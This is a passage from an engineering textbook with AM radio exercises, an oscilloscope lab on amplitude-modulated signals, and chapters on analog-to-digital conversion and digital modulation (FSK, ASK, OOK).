sideband frequencies for each of the emergency alert tones will be involved.
(b) Find the bandwidth for this particular broadcast.
(c) Determine which of these two emergency alert tones (853 Hz or 960 Hz) determines the bandwidth.
(d) What is the bandwidth assigned to a commercial AM radio station in the United States?
4.
Musical notes can be viewed as pure tones (if we ignore the “warmth” added by any particular instrument). Pure tones
are signals that contain only one frequency. Chords are combinations of notes, such as the C-Major chord on the piano,
comprised of notes C, E, and G.
If the radio station 1280AM broadcasts the C-Major chord, it would broadcast the following seven frequencies, listed in
ascending order and annotated by note and sideband:
f LSB-G
f LSB-E
f LSB-C
f carrier
f USB-C
f USB-E
f USB-G
= 1,279,608 Hz
= 1,279,670 Hz
= 1,279,738 Hz
= 1,280,000 Hz
= 1,280,262 Hz
= 1,280,330 Hz
= 1,280,392 Hz
Notice that in the lower sideband, the notes are in reverse order. G, the highest pitch in the chord, is always the
farthest away from the carrier frequency. The carrier frequency is exactly in the middle. Assume that the carrier
amplitude is 100V, and the voltages for the three musical notes are all 20V.
(a) Sketch this broadcast in the frequency domain (label frequencies and amplitudes).
(b) After demodulation, what frequencies would be heard coming out of a your AM radio’s speaker?
(c) Find the bandwidth of the broadcast and determine which note (C, E, or G) sets the bandwidth.
467
5. For the following plots of AM signals, determine Vmax, Vmin, Vc, Vm and m. Show your work!
(a)
15
13
11
9
7
5
AM signal
3
1
-1
-3
-5
-7
-9
-11
-13
-15
0
0.5
1
1.5
2
2.5
3
3.5
4
4.5
5
3
3.5
4
4.5
5
time (msec)
(b)
20
18
16
14
12
10
8
6
AM signal
4
2
0
-2
-4
-6
-8
-10
-12
-14
-16
-18
-20
0
0.5
1
1.5
2
2.5
time (msec)
468
(c)
15
13
11
9
7
5
AM signal
3
1
-1
-3
-5
-7
-9
-11
-13
-15
0
0.5
1
1.5
2
2.5
3
3.5
4
4.5
5
3
3.5
4
4.5
5
time (msec)
(d)
20
18
16
14
12
10
8
6
AM signal
4
2
0
-2
-4
-6
-8
-10
-12
-14
-16
-18
-20
0
0.5
1
1.5
2
2.5
time (msec)
6.
Determine fc and fm for any of the AM signals in problem 5 (parts (a)-(d)). (Hint: fc and fm are the same for each case).
Using these values of fc and fm, along with your answers to problem 5, sketch the frequency content for each of these AM
signals (parts (a)-(d)).
7.
For any of the plots shown in problem 5, determine the bandwidth of the transmission. Note that each of these AM
signals has a single sinusoid as the information signal. (Hint: the bandwidth is the same for each case).
469
470
Security Exercise 20
Introduction to Amplitude Modulated Signals
PART I: SET UP
Check-off each step as you complete it.
Step One: Function generator setup.
□
□
□
□
□
□
□
Turn on power to the lab bench (the switch on the right that says "120V OUTLETS.")
Turn on the function generator.
Select the sinusoidal function by pressing the button with the Sine wave on it. The function
generator display should indicate a small sine wave.
Turn any other lit buttons off.
Select the Utility function and Output Setup soft key. Load should be High Z.
Push Done.
Press the output button.
Step Two: Oscilloscope setup.
□
□
□
Turn on the oscilloscope.
Locate the CH 1 input on your oscilloscope. It will have a two-input
(RED / BLACK) banana plug adaptor installed.
Connect banana plug cables (which can be found under the bench on
the plastic Quad board) from the function generator’s output to the CH
1 input on the oscilloscope (red to red and black to black).
PART II: AMPLITUDE MODULATED SIGNAL IN THE TIME DOMAIN
An Amplitude Modulated (AM) signal looks somewhat like the figure that follows. This particular depiction includes the AM
signal’s envelope, and the definitions of Vm (message amplitude), Vc (carrier amplitude), Vmax (max envelope voltage) and
Vmin (min envelope voltage). The information signal (message) modulates the amplitude of the carrier.
□
On the Function Generator select the Store/Recall button and then push Recall State and then push State 3 and then
471
Recall State again. Make sure the output button is lit.
□
□
□
□
□
□
Push AUTOSET on the Oscilloscope and you will see an AM signal.
Press CH 1 MENU on the oscilloscope and make the following settings.
 Coupling: AC
 BW Limit: OFF
 Volts/Div: COARSE
 Probe: 1X
 Invert: Off
If a trace appears for CH2, then press the CH2 Menu button twice
to turn off the CH 2 trace, since nothing is connected to CH 2 for this lab.
With the CH 1 menu selected, adjust the position of the vertical axis zero
level by rotating the position knob under the vertical section in the CH 1
column, so that the “1→” on the left side of the LCD is adjacent to the
major horizontal axis (centered vertically on the display).
Adjust the vertical scale (Volts/Div) to enlarge the
displayed signal so that
it occupies more than half of the oscilloscope display.
Adjust the horizontal range (Sec/Div) so that you can
see the AM waveform similar to the one shown on
Figure 1 above. You may have to adjust the knob
for trigger level (it is to the far right below the
AUTOSET button) to clean up the signal. Turn the
knob so that you see the trigger level (arrow to far
right of screen) rise from the center line. Hint: if you
have trouble removing the “jitter” from the graph, use
the “Run/Stop” button in the upper right hand corner
of the oscilloscope to pause the capture.
Once the display is properly adjusted, use the boxes on the oscilloscope to measure the following parameters. Record your
results in Question 1 on your answer sheet.
1.
Measure Vmin and Vmax (see Figure 1).
2.
Measure the period of the carrier, T carrier (higher frequency signal). You will have to adjust the horizontal
(sec/div) scale to accurately measure a the period of a cycle of the high frequency carrier signal.
3.
Measure Tmessage, the period of the message (lower frequency signal). You will need to adjust back the
horizontal (sec/div). Note: T message measures the cycle of the wave that rides along the top of the carrier as the
carrier is modulated.
Calculate the modulation index m, the carrier frequency (fc), the message signal's frequency (fm), the amplitude of the carrier
(Vc) and the amplitude of the message signal (Vm). Use the equations shown in Table 1 below along with your measured
values. Record your results in Question 1 on your answer sheet.
Vm =
Vmax - Vmin
2
Vc =
Vmax + Vmin
2
m=
Vm Vmax - Vmin
=
Vc Vmax + Vmin
1
1
fm =
Tc
Tm
Question 2: Determine the equation of the AM waveform displayed on the oscilloscope. Write your answer on your answer
sheet using the form below, but with numerical values replacing A, B, C and D:
fc =
472
vam (t) = [ A + Bsin(2p Ct)]sin(2p Dt)
PART III: AMPLITUDE MODULATED SIGNAL IN THE FREQUENCY DOMAIN
Let’s look at the frequency spectrum of this signal. In class we manipulated the above equation to show us what frequencies
will show up in the frequency domain:
vAM (t) = Vc sin(2p fct) +
Vm
V
cos ( 2p ( fc - fm ) t ) - m cos ( 2p ( fc + fm ) t )
2
2
There are 3 frequencies in the AM signal: the carrier and its 2 sideband frequencies. So let us try to see this signal in terms
of its frequency content. Again, the oscilloscope performs a fast Fourier transform (FFT) and displays the magnitudes of the
frequencies present in the signal vs. frequency, so the horizontal scale shows frequency instead of time. The y-axis will show
values in decibels, which can be ignored for this lab.
□
□
□
Press AUTOSET and you will see the options to display the signal in time or in frequency (FFT). (NOTE: If the
FFT option does not appear when you press AUTOSET, then press the MATH MENU button.)
Push the button next to the FFT (or stay in FFT operation) and you will see spikes at specific frequencies.
Set the horizontal scale to read 12.5 kHz per division using the Sec/Div knob.
Question 3. Determine the value of the center and sideband frequencies. Use the Frequency cursor (recall that when using
the FFT to show frequency content, the source must be MATH, not CH 1 or CH 2 to use the frequency plot cursors)
Question 4. Sketch your frequency plot. Label the frequency axis with your values and have your instructor check it.
Question 5. What is the bandwidth of the amplitude modulated waveform?
Question 6. Rewrite your AM signal using the form below:
vAM(t) =
Asin ( 2p Bt ) + C cos ( 2p Dt ) - E cos ( 2p Ft )
filling in numerical values for A, B, C, D, E and F (different than the A-D above).
Question 7. Is this AM signal within the range of commercial AM radio frequencies?
Question 8. If the information signal from above contained many frequencies (including frequencies higher than the fm you
measured), how would this affect the bandwidth of the amplitude modulated waveform?
PART IV: ANOTHER AMPLITUDE MODULATED SIGNAL
You have a message signal you would like to transmit, but do not have access to an AM transmitter. An evil user offers to
transmit your signal (for a small fee). You pay the fee. Your customers start complaining that your signal sounds terrible.
You examine the amplitude modulated signal that the evil user has generated for you:
□
□
□
On the Function Generator select the Store/Recall button and then push Recall State and then push State 4 and then
Recall State again. Make sure the output button is lit.
Push AUTOSET on the Oscilloscope and you will see an AM signal.
Eliminate the CH 2 signal (if necessary), vertically center the waveform and adjust the horizontal range and trigger
level to stabilize the AM signal.
Question 9. Explain the problem with the evil user AM signal (hint: look at the shape of the envelope).
473
474
Security Exercise 20 Answer Sheet
Name:
__________________________________________________________________________________________
Question 1:
Vmax
Vmin
Vc
Vm
Tc (s)
Tm (s)
fc (kHz)
fm (kHz)
m
__________________________________________________________________________________________
Question 2:
__________________________________________________________________________________________
Question 3: fc = ___________
flsb = _____________
fusb = _____________
__________________________________________________________________________________________
Question 4:
__________________________________
Instructor / Lab Tech
__________________________________________________________________________________________
Question 5:
__________________________________________________________________________________________
Question 6:
__________________________________________________________________________________________
Question 7:
__________________________________________________________________________________________
Question 8:
_________________________________________________________________________________________
Question 9.
__________________________________________________________________________________________
475
476
Chapter 21: Analog to Digital Conversion
Objectives:
(f)
(g)
(h)
(i)
Provide examples of analog and digital communication systems.
Describe the advantages of digital over analog communication.
Discuss the basic steps of the analog-to-digital conversion process: sampling, and quantizing/encoding.
Given an analog waveform, sampling rate, and resolution, determine the resulting quantized signal and the binary encoded
A/D output.
(j) Calculate the Nyquist sampling rate for an analog signal.
(k) Given the number of bits in an A/D process, and sample frequency, determine generated bit rate.
(l) Describe how the number of bits used in the A/D process effects the reconstructed analog signal.
Connection to Cyber Security
In Chapter 20, you learned about modulation, and that it is impractical to transmit signals at baseband frequencies through
free space. Modulation upshifts the frequency of transmission, to allow for smaller antennas. For an AM communication
system, the signals at various places in the system is shown below.
We could have also used FM or PM, in which case the signal that exists in the communication channel (free space) might look
like the following, depending on the information signal (left: frequency modulation, right: phase modulation).
In a digital communication system, the information is composed of 1s and 0s, and the information signal is composed of voltage
pulses that represent the 1s and 0s. Hackers can attack our system in a number of ways, such as “reading our mail” or injecting
their own information into our channel. In the digital age, cyber attacks usually fall onto digital communication systems. But
where do the 1s and 0s come from? Chapter 21 deals with how 1s and 0s are created from an analog signal.
1. Analog Systems.
When you look at the waveform below, you should notice that it is a signal that varies continuously in time and amplitude. If
we observed nature, we would see that nature produces signals like this (i.e., changes in pressure, variations in light, sounds,
etc.). Analog systems use analog electrical signals to represent these natural patterns, such as the voltage signal created from
the sound waves of a person speaking into a microphone, shown in the next figure.
477
What do you think might be an example of an analog system in action? How
about an 8-track tape player playing the songs on Michael Jackson’s 8-track
album, Thriller.
This is a great example of an analog system, but my guess is you have no idea
what an 8-track is. So, let’s list some other analog systems that that may ring a
bell: AM/FM radios, rotary telephones, cassette tape players, VCRs, broadcast
TVs, the microphone you are singing into at Bancroft’s karaoke night…
So maybe you’re thinking, “I still have no idea what that stuff is!” There’s
probably a reason for that. We don’t really use many systems that are completely
analog anymore; digital communications are more widely used.
2. Digital Systems.
Let’s think for a second about comparisons between what was used in the past and what you use now:
Type of Information
Music
Videos
Broadcast Television
Past Device
Cassette Tape
VHS (VCR)
Standard Definition TV
Present Device
CD
DVD/Blueray Disc
High Definition TV (HDTV)
We want the same types of information but are using a different method to get them: digital systems. Digital systems use
electrical signals that represent discrete (often binary) values. The electrical signals are referred to as digital signals.
Specifically, binary baseband digital signals use two discrete voltage levels to represent binary 1 or 0 (bits), as shown in the
example plots below. Combining multiple bits into words permits us to represent more than just two things. Digital circuits
operate on digital signals, performing logic and arithmetic functions.
Interesting fact and important to the class: digital signals are not representative of signals that occur in nature. Natural
signals are analog, and must be converted into digital format to be used in a digital system.
Great! So we’re using a new method to get the same information. Is this a big deal? It is, because using digital systems
offers a number of advantages over using analog systems.
3. Digital Advantages.
1. Relative noise immunity. (What is the number one limiting factor in communications? Noise.)
Relative noise immunity is the most important advantage of digital communications
Between the transmitter and receiver, whether the system is analog or digital, noise always corrupts the transmitted signal. In
general, an analog receiver has no idea what the received signal is supposed to be after it has been corrupted by noise, but a
digital receiver only has to decide between a finite set of choices: for example, a binary digital system’s receiver must only
decide at any time whether or not it is receiving a binary 0 or a binary 1. This means that receiver circuitry can be designed
to distinguish between a 0 and 1 even in the presence of a significant amount of noise. It is possible that the noise could be
severe enough that the receiver gets confused, and incorrectly decides it is receiving a 0 when it should be deciding a 1 (or
vice versa)…these are referred to as bit errors. But in general, digital systems are much better in noisy environments.
478
In long distance digital communications, digital signals can be stripped of any noise in a process called
signal regeneration. Consider a long distance transmission that incorporates a set of relay stations in
order for the signals to move from transmitter to receiver, as shown in the figure to the right. Relay
stations are needed because the farther a signal travels, the weaker it gets; to make it to its destination,
it must be amplified and retransmitted at the relay stations.
If this was an analog system, the analog signal is received, amplified and retransmitted at each station.
However, noise is now a part of the signal, and so is also amplified at each station.
In a digital communication system, a digital signal is received (receiver decides 0s or 1s), regenerated
(digital signal recreated based on the 0s and 1s), and then retransmitted at each station. With signal
regeneration, the noise can be eliminated at each station. This can only be done in digital
communication systems.
2. Error detection/correction. Digital signal processing (DSP) techniques allow the detection and
correction of bit errors. Even if a digital signal contains bit errors, many of these errors can be fixed at
the receiver through the use of error correcting codes. Error correcting codes allow, for example, CDs
with minor scratches to be played without errors. Analog systems cannot detect or correct errors.
3. Easier multiplexing. Multiplexing is the process of allowing multiple signals to share the same transmission channel. For
example, digital telephony allows carrying 24 phone conversations on a single wire (called a T1 line) at the same time.
Digital signal processing techniques enable this.
4. Easier to process and store. Since computers store and use digital data, digital signals can be easily processed by
computers. Similarly, the digital format lends itself to easier storage of communication signals (e.g., smaller storage
footprint). DSP allows operations such as filtering, equalization and mixing to be done in software without the use of analog
circuits. DSP also permits data compression (transforming signals so that fewer bits are needed to represent them). An
example of DSP would be Garage Band, for you musicians, or photo editing software like Adobe Photoshop, for those with a
knack for photography.
To emphasize this again, these advantages are huge. This is such a big deal that even though communication systems used to
be exclusively analog, it is worth the billions and even trillions of dollars that the government and private sector are spending
to migrate communication systems to digital.
4. Conversion from Analog to Digital (A/D)
If nature produces analog signals, how do we create digital signals from them? Before we can use digital transmission, we
must convert the signal of interest into a digital format. The natural signal (e.g., speech) that we want to transmit will be
acquired using an analog device. The analog signal will be translated into a digital signal using a method called analog-todigital (A/D) conversion. The device used to perform this translation is known as an analog-to-digital converter or ADC.
Through A/D conversion, analog signals are changed into a sequence of binary numbers (encoded bits), from which the
digital signal is created by the transmitter. This process is depicted below.
There are two major steps involved in converting an analog signal to a digital signal represented by binary numbers: sampling,
and quantizing/encoding.
Steps for A/D conversion:
1. Sampling. This is a process of inspecting the value (voltage) of an analog signal at regular time intervals. The time
between samples is referred to as the sample period (T, in seconds), and the number of samples taken per second is referred to
as the sample frequency (fs, in samples/second or Hz). Basically, sampling is taking snap-shot values of the analog signal so
that you have an accurate representation of how the analog signal is changing over time.
479
The receiver must convert the bits it receives into sample values, and then recreate what it thinks the analog signal looks like
from the samples alone. As you might deduce from the figure below, when the samples are closer together (smaller sample
period, which means higher sample frequency), the analog signal is more accurately represented. Note that with the lower
sample rates, some of the fluctuations in the analog signal have no samples on them, so the samples are not a good
representation of the analog signal. How high does our sampling frequency fs need to be in order to accurately represent the
signal? That is, what is the minimum sample frequency for the A/D to work properly?
We could consider taking just a few samples (i.e., using a low sampling rate), which means less information to transmit to the
receiver. But if we choose that option, when we reconstruct the signal, it will likely be a terrible representation of the
original. The low sampling rate will only work well for very slowly changing (low frequency) signals. Alternatively, we
could choose the highest possible sampling rate known to man, to ensure that we can accurately capture even very fast signal
fluctuations. But the higher the sampling rate, the higher the cost of the equipment and more information must be transmitted.
In addition, if we decide to record the communications our saved files will be unnecessarily enormous.
But what is “low” and what is “high”? In other words, how exactly do I go about choosing my sampling rate? In order to
accurately reconstruct an analog signal from its samples, one must sample faster than the Nyquist sampling rate (also called
the Nyquist rate), fN, given by the formula
𝑓𝑁 = 2𝑓𝑚𝑎𝑥 , where fmax is the highest frequency component of the analog signal.
That is, the sampling frequency must be more than twice the value of the highest frequency component of the signal:
f s  f N , where fN = 2fmax
If the sample rate is not greater than the Nyquist rate, a problem called aliasing results. We’ll talk more about aliasing in the
lab, but it can cause severe distortion of your signal.
The Nyquist sample rate is a floor on the
examples of common sample rates are:
Signal
Voice
Music
Music
sampling rate, and practical systems sample greater than the Nyquist rate. Some
Signal frequency range
300 Hz-3 kHz
0-20 kHz
0-20 kHz
480
Standard Sample Rate
8 kHz
44.1 kHz (CD-quality)
192 kHz (DVD-quality)
Practice Problem 21.1
Consider the signal from the oboe depicted below in time and frequency domain representations.
What is the maximum frequency present in the oboe signal?
1. Based upon this, what sampling rate must be exceeded in order to accurately reconstruct the signal from its
samples?
1
0.25
0.2
Voltage (V)
Voltage (V)
0.5
0
0.15
0.1
-0.5
0.05
-1
1
1.0005 1.001 1.0015 1.002 1.0025 1.003 1.0035 1.004 1.0045 1.005
Time (sec)
0
0
1000
2000
3000
4000
5000
Frequency (Hz)
2. Quantizing/Encoding. Quantizating/encoding is the process of mapping the sampled analog voltage values to discrete
voltage levels, which are then represented by binary numbers (bits). This is needed because the analog sample values are real
numbers that occur on a continuum. That is, for example, if a sine wave of amplitude 1V is being sampled, the sample values
could be any value between -1V and +1V… an infinite number of possibilities. In any digital system, there is only a finite
amount of memory, so only a finite number of values can be used to represent the samples of the analog signal. Converting a
sample value from the set of infinite possibilities to one of a finite set of values is called quantization or quantizing. These
values are referred to as quantization levels.
Inputs to A/D converters are limited to a specific voltage range. For the sine wave example above, we assumed that all
values of the analog input fall within a range of -1.0 to +1.0 volts (note: this is the typical voltage range of voice or music
signals on a computer, such as in .wav or .mp3 files).
A/D systems are characterized by the number of bits they have available to perform quantization. The number of bits
determines the number of quantization levels. An N-bit A/D converter has 2N quantization levels and outputs binary words of
length N (that is, it outputs N-bit values for every sample). For example, a 3-bit A/D system has 23 = 8 quantization levels, so
all samples of a 1V analog signal that is input to this A/D will be quantized into one of only 8 possible quantization levels
and each sample will be represented by a 3-bit digital word. In general, the A/D converter will partition a range of voltage
from some vmin to some vmax into 2N voltage intervals, each of size q volts, where
q
vmax  vmin
.
2N
Some common examples of A/D quantizing are digital telephony, which uses 8-bit A/D (28 = 256 quantization levels), CD
audio, which uses 16-bit A/D (216 = 65,536 quantization levels), and DVD audio, which uses 24-bit A/D (224 = 16,777,216
quantization levels).
481
6000
The following figures represent conceptionally how a 3-bit A/D converter converts an analog signal into bits. In these figures,
the analog signal is shown as well as the samples, with samples taken every 0.5 msec (corresponding to a sample rate of fs =
1/0.0005 sec = 2000 samples/sec). The actual analog sample voltages are shown in parantheses next to the samples. Here, the
voltage range of the signal is divided into 23 = 8 smaller voltage intervals (also called steps). These are separated by the
dashed, bold horizontal lines, and each interval is 0.25V wide:
q=
vmax - vmin 1- (-1)
=
= 0.25V
2N
8
.
The value of q is more formally called the quantizer’s resolution.
Each of the voltage intervals is assigned an N-bit binary number representing the integers from 0 to 2  1 . For this
example, you can see that since we are using a 3-bit A/D, the intervals will be assigned binary numbers representing the
integers from 0 to 7 (that is, 000, 001, 010, …, 111), starting from the bottom of the voltage range. In this case, the digital
word 000 is assigned to the voltages from -0.75 V to -1.0 V, 001 is assigned to the voltages from -0.5 V to -0.74999 V…,
and so on. The figure that follows shows for each quantization interval the associated 3-bit digital word (on the left side of
the plot). Any analog sample that falls in a given voltage interval will result in those 3 bits being transmitted.
N
When a sample point falls within a given interval, it is assigned the corresponding binary word (this is the Encoding part of
Quantization/Encoding). For the first sample point at time 0, the voltage is 0.613 V, which means that sample is assigned a
binary value of 110. The A/D then creates a voltage signal that represents these bits, and that process continues as long as an
analog signal is input to it.
482
The binary representation of the above signal is:
110 101 100 011 011 100 110 110 100 010 000 000 001.
In this example, every sample produces 3 bits (that is, there are 3 bits/sample). The sample rate was 2000 samples/sec.
Multiplying these two values together results in the bit rate (Rb) produced from this A/D conversion:
Rb =
3 bits 2000 samples
´
= 6000 bits/sec (bps)
sample
sec
To the right of the plot above is the quantization level associated with each voltage interval. Any analog sample voltage that
falls in a given interval is effectively estimated to the center of its quantization level when it is desired to reconstruct the
analog signal from the received bits (a receiver may perform this). This process is referred to as Digital-to-Analog conversion
(D/A) and will be discussed briefly in the next section. For this example, the quantization level for the lowest voltage interval
is the value halfway between -.75 V and -1 V (which is -0.875 V). This means that any analog sample that fell into this range
will be represented as -0.875 V.
Alright, we’ve walked through an A/D example together; now it’s your turn.
483
Practice Problem 21.2
Consider the following analog waveform. This waveform is sampled at a 500 Hz rate and quantized with a 2-bit quantizer
(i.e., A/D converter) The input range is -1.0 to +1.0 V.
a. Circle the sample points (first sample is at time t = 0 sec).
b. Indicate the quantization intervals and corresponding digital words.
c. Indicate the digital word assigned to each sample point.
d. What is the stream of binary bits generated after the A/D conversion is complete?.
e. What is the resulting bit rate from this A/D?
Amplitude (volts)
time (msec)
484
To give you an idea, here’s the effect of quantizing in a digital picture. Look at a color display of this picture (such as the pdf
file of the notes posted on the course website). See the difference?
4 bit = 16 colors
8 bit = 256 colors
Here is an example of a digital voltage waveform that might have been generated from an A/D process:
011100110111111110011001
This waveform could be transmitted from the receiver to the transmitter over a wire, but is not suitable to transmit wirelessly
through the atmosphere. We’ll get into more detail about how this is done in our next chapter on digital modulation.
5. Conversion from Digital to Analog (D/A)
But how do we recover the analog information after it has been converted to digital? As mentioned earlier, the receiver
converts these N-bit digital words back into an analog signal. This process is called digital-to-analog (D/A) conversion. It is
very similar to being the reverse of the analog-to-digital conversion process. The analog signal is reconstructed by converting
the N-bit digital words into the appropriate quantization levels, and this voltage is “held” for one sample period, creating a
stairstep-type signal shown below.
Good job. We’ve regenerated our original signal. How does it compare with the original? Let’s see. The reconstructed
analog signal for our 3-bit example is shown in a thick black line in the next figure, along with the 3-bit digital word that
represents each sample. The original analog signal is also shown in the continuous line, along with all of the sample points
that were on the earlier figures.
485
Is it close? It follows the same general shape. Even if we perform filtering to smooth out the reconstructed signal to remove
its staircase appearance (which is typical) it will still not quite be the same as the original red signal. Why? Is that the best we
can do?
6. Quantization Error.
There is always error introduced with the A/D process. The error is the difference between the original analog signal and the
reconstructed (stairstep) signal after A/D and D/A. The following figure is a portion of a music signal that has been quantized
with 3 bits. The upper plot shows the original analog signal along with the recovered analog signal from the A/D process. The
bottom plot is the quantization error, which is created by subtracting the recovered signal from the original analog signal at
each instance of time.
So is it bad? It can be. The quantization error manifests as noise in the reconstructed analog signal. For digital audio signals
(music or voice), it can sound like static. The greater the quantization noise, the louder the static, making it harder to hear the
voice or music. Reiterating what was presented in Chapter 19: NOISE IS THE NUMBER ONE LIMITING FACTOR IN
COMMUNICATION SYSTEMS. In this case, if quantization is part of the communication system (e.g., using a digital
communication system to transmit analog information), then the A/D process adds even more noise to the signal as it moves
from transmitter to receiver.
So how do we reduce the quantization error and its associated noise? Quantization error can be reduced by increasing the
number of bits N for each sample. This will make the quantization intervals smaller, reducing the difference between the
analog sample values and the quantization levels. The figure below is the same analog signal quantized with 4-bits per
sample. Note the step-size is smaller than in the 3-bit plot, (½ the size), and the noise signal is approximately ½ the
amplitude of what it was with 3-bit quantization. The reconstructed signal looks much closer to the original analog signal
compared to the 3-bit A/D. It is worth noting that increasing the sampling frequency will not reduce quanitzation noise, only
increasing the number of quantization levels will do this.
486
We of course can’t use an infinite number of bits, so some quantization noise is always inevitable, but the nice thing about
the human ear/brain - sticking with the example of audio signals - is that beyond a certain number of bits for each sample, the
associated quantization noise becomes imperceptible. We just need enough bits to make the recovered signal “good enough”
(e.g., the recovered music sounds “good enough”).
487
488
Problems
1.
What is the greatest advantage that digital communication has over analog communication?
2.
Describe the function of a regenerative repeater.
3.
What is the cause of aliasing in the A/D process?
4.
Why does a 5-bit quantizer produce a better approximation to an analog signal than a 3-bit quantizer?
5.
A music signal has frequency content from 0 Hz up to 18.75 kHz. What sampling frequency must be exceeded for
successful A/D conversion? What is another name for the minimum sampling frequency?
Consider the following analog waveform. This waveform is to be sampled at a 1-kHz rate and quantized with a 3bit quantizer (input voltage range is -1.0 to +1.0 V).
a.
b.
c.
d.
e.
What is the resolution (q) of this quantizer?
Circle the sample points on the analog waveform below.
Indicate the quantization intervals and corresponding digital words.
Indicate the digital word assigned to each sample point.
When a receiver receives the transmitted bits, D/A is used to recover the analog signal, but the recovered signal
1.000
0.750
0.500
Voltage (V)
6.
0.250
0.000
-0.250
-0.500
-0.750
-1.000
0
1
2
3
4
5
6
7
8
Time (ms)
is not the same as the original analog signal. What is the term to describe this difference and what can be done
to minimize this difference?
7. Consider the following analog waveform. This waveform is to be sampled at a 1.333333 MHz rate and quantized with
a 3-bit quantizer (input voltage range is -2.0 to +2.0 V).
a.
b.
c.
d.
What is the resolution (q) of this quantizer?
Circle the sample points on the analog waveform below.
Indicate the quantization intervals and corresponding digital words.
Indicate the digital word assigned to each sample point.
489
2
1.5
1
amplitude (V)
0.5
0
-0.5
-1
-1.5
-2
0
0.5
1
1.5
2
2.5
time (microsec)
490
3
3.5
4
4.5
5
Chapter 22: Digital Modulation
Objectives:
(a) Quantitatively describe the relationship between a symbol and a bit and the bit rate and the baud.
(b) Describe how digital information is conveyed using various digital modulation techniques (ASK or OOK, FSK, PSK and
QAM) and recognize their waveforms, and constellations.
(c) Calculate the bandwidth of an ASK, FSK, PSK, or QAM signal.
(d) Using a constellation diagram analyze a M-ary PSK signal to determine its symbols and bits per symbols.
(e) Discuss the effect of noise on M-ary PSK and how Quadrature Amplitude Modulation (QAM) overcomes these detrimental
effects.
1. Digital Signal Frequency Spectrum
In Chapter 21, it was mentioned that in many cases, we wished to convert analog signals into digital signals to take advantage
of the benefits of digital technologies. Samples of the analog signal were converted into bits and the bits were then used to
create a binary voltage waveform that represented the bits. If we then wanted to transmit this digital waveform through free
space, then all we need to do is connect it to an antenna, right?
No, it is not that easy. The binary voltage waveforms to which we are so accustomed are, typically, voltage pulses that
alternate between 0V (for a 0-bit ) and 5V (for a 1-bit). It just so happens that the preponderance of frequency content in
these voltage pulses is very low (a baseband signal), and just like was pointed out for voice signals (which also have low
frequency content), an antenna needed to transmit this kind of signal through free space would be impractibly large.
For a large number of random voltage pulses, the frequency plot would look something like the following, where Rb is the
value of the bit rate in Hz.
For example, if the bit rate were 500 bps, then the frequency content magnitude would be equal to zero at 500 Hz, 1000 Hz,
etc. This plot of frequency content is much different than that of a signal composed of sinusoids! There are no spikes!
Nevertheless, most of the frequency content is at very low frequencies. The frequency content does continue out to an infinite
frequency, although the magnitude drops dramatically at higher frequencies. In a perfect world, we’d say the bandwidth of
voltage pulses approaches ∞ Hz, but for digital signals, we’ll use the null-bandwidth as our calculated bandwidth. The nullbandwidth is defined as the amount of the frequency spectrum (in Hz) from the maximum magnitude (which occurs at 0 Hz)
to where the spectrum first goes to a magnitude of 0 (called a null, here at Rb Hz). The bandwidth is given by:
BW = f2 - f1 = Rb - 0 = Rb Hz .
We must come up with a method to transmit the digital information (1s and 0s) using radio waves. Digital modulation
techniques allow this. As you recall, the goal of modulation is to upshift the frequency spectrum of the information signal to
allow transmission through free space; the transmitted signal’s frequency spectrum would then look like the following.
491
Recall that, like in analog amplitude modulation, the information signal’s frequency spectrum is shifted up by fc Hz, and there
is a mirror image of the frequency content on the left side of fc. The transmission bandwidth (using the null-bandwidth
definition) is now
BW = f2 - f1 = ( fc + Rb ) - ( fc - Rb ) = 2Rb Hz
2. Binary Digital Modulation
Recall the equation for a high frequency carrier: vc(t)=Vc sin(2πfct + θ). As discussed in Chapter 20, a sinusoidal carrier can
be modulated by varying its amplitude, frequency, or phase using an information signal. So, how do we go about representing
1s and 0s with modulation? Just as we can vary amplitude, frequency, and phase of a high-frequency carrier in accordance
with an analog waveform, we can do the same with a digital waveform. Since bit values shift between 0s and 1s, digital
modulation techniques that vary the carrier’s amplitude, frequency, and phase are referred to as “shift keying.”
Frequency Shift Keying (FSK)
Frequency-shift keying (FSK) is a frequency modulation scheme in which digital information is transmitted through discrete
frequency changes (shifts) of a carrier wave. The simplest form of FSK is Binary FSK (BFSK), in which a carrier’s
frequency is shifted to a low frequency or a high frequency to transmit 0s and 1s. The plot below shows a sample FSK signal
along with the associated bits.
An example of how FSK was used “back in the day” was with dial-up modems to connect your home computer to your
Internet service provider over your analog phone. With a modem, a 0-bit was represented with a lower frequency carrier of
1070 Hz and a 1-bit was represented with a higher carrier frequency of 1270 Hz. The lower frequency, binary 0, was called
the “space” frequency while the higher frequency, binary 1, was called the “mark” frequency. The terms mark/space were a
throwback to the days of Morse code or flashing light communications.
In the frequency domain, we consider FSK to be two different digital transmissions, one at the mark frequency (the higher
frequency) and one at the space frequency (lower frequency). The resulting frequency plot would look like the following,
with the carrier frequency being shifted between the mark and space frequencies.
The amount that the carrier frequency can be shifted is called the frequency deviation (Δf). To determine the bandwidth for
FSK modulation, we take a closer look at the frequency spectrum around the mark and space frequencies. We use the nullbandwidth definition to compute the bandwidth as shown below.
In the figure, the bandwidth effectively runs from the first null to the left of fspace to the first null to the right of fmark.
Mathmatically, there are two equations that can be used to compute the bandwidth:
BW = ( fmark + Rb ) - ( fspace - Rb ) = fmark - fspace + 2Rb
or
BW = 2(Df + Rb )
492
Practice Problem 22.1
You have an FSK transmitter using a carrier of 500 kHz sending 10 kbps and a frequency deviation of 100 kHz. How much
bandwidth do you need for your transmission?
Of course, who still uses dial-up? What else is there?
Amplitude Shift Keying (ASK) and On-Off Keying (OOK)
Amplitude Shift Keying is a form of amplitude modulation that represents digital data as shifts in the amplitude of a carrier
wave: for example, small amplitude for a 0-bit, and larger amplitude for a 1-bit. We have seen what an ASK signal has
looked like before in Chapter 21, repeated below.
The simplest digital modulation scheme is a form of ASK called on-off keying (OOK). This is analogous to Morse code. In
OOK, a carrier is transmitted for a 1-bit and nothing is transmitted for a 0-bit; this is the same as saying that the smaller ASK
amplitude is 0.
Note that in all forms of ASK, the frequency and phase of the carrier are the same for all outputs; it is the amplitude that
changes.
Practice Problem 22.2
Sketch an OOK signal that represents the bit stream below.
1
0
0
0
1
1
Before we continue, you need to learn some important terms that used in digital communication systems. The information is
carried in the bits that are transmitted, but we don’t actually transmit bits; we transmit waveforms that represent bits. These
waveforms are commonly referred to as symbols. On a wire, the symbols take the form of voltage pulses. In FSK and OOK,
the symbols take the form of a high frequency carrier that has its frequency or amplitude altered based on whether a 0-bit or a
1-bit is being transmitted. In these modulation schemes, the number of symbols that can be transmitted (M) is two (M = 2)
